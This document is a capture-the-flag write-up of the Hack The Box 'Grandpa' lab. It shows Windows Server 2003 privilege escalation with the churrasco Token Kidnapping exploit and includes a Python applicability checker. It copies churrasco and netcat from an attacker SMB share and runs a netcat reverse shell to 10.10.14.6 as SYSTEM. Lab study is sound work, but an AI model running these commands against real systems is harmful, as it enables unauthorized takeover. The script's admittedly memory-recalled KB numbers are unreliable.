Token Kidnapping


Churrasco is Cesar Cerrudo's Token Kidnapping exploit. Running as a low-privileged service account such as NETWORK SERVICE, it locates the RPCSS service process, walks its threads until it finds one impersonating a client, and uses that token to obtain a SYSTEM token for the command you supply. It is effective against older, unpatched systems affected by:

  • CVE-2008-1436
  • CVE-2009-0079
  • and related Token Kidnapping issues
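Before copying the exploit over it is worth confirming that the target actually matches the preconditions above: an affected OS build, a foothold account holding SeImpersonatePrivilege (NETWORK SERVICE does), and no MS09-012 hotfix. The following pre-flight check is an added example, not part of the original writeup or of churrasco itself. It parses text you can collect from the foothold shell (`ver`, `whoami /priv`, `wmic qfe get HotFixID`); the sample outputs are constructed, and the KB numbers for MS09-012 and the XP version tuple are recalled from memory and should be confirmed against the bulletin.

```python
"""Pre-flight assessment for Token Kidnapping (churrasco) applicability.

Added example; parses command output gathered from the foothold shell.
"""
import re

# NT version families churrasco was written against. The page only shows
# Server 2003 (5.2.3790); XP is included on the ASSUMPTION that the same
# RPCSS service-isolation weakness applied there.
AFFECTED_VERSIONS = {(5, 1): "Windows XP", (5, 2): "Windows Server 2003"}

# MS09-012 (April 2009) shipped the fixes for the Token Kidnapping CVEs.
# ASSUMPTION: KB numbers recalled from memory; confirm against the bulletin.
MS09_012_KBS = {"KB956572", "KB952004"}

# Constructed sample outputs, modelled on the page's banner and on the
# default privileges of NETWORK SERVICE.
BANNER = "Microsoft Windows [Version 5.2.3790]"
SAMPLE_PRIVS = """PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
"""
QFE_UNPATCHED = "HotFixID\nKB942288\nKB950762\n"
QFE_PATCHED = "HotFixID\nKB942288\nKB950762\nKB956572\n"


def parse_ver(banner):
    """Return (major, minor, build) from 'Microsoft Windows [Version 5.2.3790]'."""
    m = re.search(r"Version\s+(\d+)\.(\d+)\.(\d+)", banner)
    if not m:
        raise ValueError("no Windows version banner found")
    return tuple(int(x) for x in m.groups())


def parse_privileges(whoami_priv):
    """Return {privilege_name: enabled} from `whoami /priv` output."""
    privs = {}
    for line in whoami_priv.splitlines():
        m = re.match(r"\s*(Se\w+Privilege)\s+.*?(Enabled|Disabled)\s*$", line)
        if m:
            privs[m.group(1)] = m.group(2) == "Enabled"
    return privs


def parse_hotfixes(qfe_output):
    """Collect every KBnnnnnn token from `wmic qfe get HotFixID` output."""
    return set(re.findall(r"KB\d{6,7}", qfe_output))


def assess(banner, whoami_priv, qfe_output):
    """Combine the three checks into one verdict on churrasco applicability."""
    ver = parse_ver(banner)
    family = AFFECTED_VERSIONS.get(ver[:2])
    has_impersonate = parse_privileges(whoami_priv).get("SeImpersonatePrivilege", False)
    patched = bool(parse_hotfixes(qfe_output) & MS09_012_KBS)
    return {
        "os": family or "version %d.%d not targeted by churrasco" % ver[:2],
        "build": ver[2],
        "impersonate": has_impersonate,
        "ms09_012_present": patched,
        "likely_vulnerable": family is not None and has_impersonate and not patched,
    }


if __name__ == "__main__":
    for label, qfe in (("unpatched", QFE_UNPATCHED), ("patched", QFE_PATCHED)):
        print(label, assess(BANNER, SAMPLE_PRIVS, qfe))
```

The verdict is only a screen: an unpatched, impersonation-capable Server 2003 host is the case the page shows, while a host listing an MS09-012 KB should send you looking for a different escalation path before burning time on churrasco.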
c:\WINDOWS\Temp\venom> copy \\10.10.14.6\smb\churrasco.exe
        1 file(s) copied.
 
c:\WINDOWS\Temp\venom> .\churrasco.exe
.\churrasco.exe
/churrasco/-->usage: Churrasco.exe [-d] "command to run"

Transferring the exploit binary to the target system over SMB. The exploit is straightforward to use: it takes an optional -d flag followed by the command to run.

c:\WINDOWS\Temp\venom> copy \\10.10.14.6\smb\nc.exe
        1 file(s) copied.
 
c:\WINDOWS\Temp\venom> icacls nc.exe /grant Everyone:F
processed file: nc.exe
Successfully processed 1 files; Failed processing 0 files

I also uploaded Netcat to the target and granted Everyone full control on it, so that the process churrasco spawns can execute it.

c:\WINDOWS\Temp\venom>.\churrasco.exe -d "C:\WINDOWS\Temp\venom\nc.exe 10.10.14.6 1234 -e cmd"
/churrasco/-->current user: NETWORK SERVICE 
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->found rpcss pid: 668 
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->found thread: 672 
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->found thread: 676 
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->found thread: 684 
/churrasco/-->thread impersonating, got network service token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!

Executing the exploit. The output walks through the technique: churrasco locates the RPCSS process (PID 668), iterates its threads until it finds one that is impersonating a client (thread 684, holding NETWORK SERVICE token 0x730), obtains a SYSTEM token (0x728) from the RPCSS service, and launches the supplied Netcat command with it.

┌──(kali㉿kali)-[~/archive/htb/labs/grandpa]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.14] 1037
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
 
c:\WINDOWS\TEMP> whoami
nt authority\system
 
c:\WINDOWS\TEMP> hostname
granpa
 
c:\WINDOWS\TEMP> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Local Area Connection:
 
   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 10.10.10.14
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2

System Level Compromise
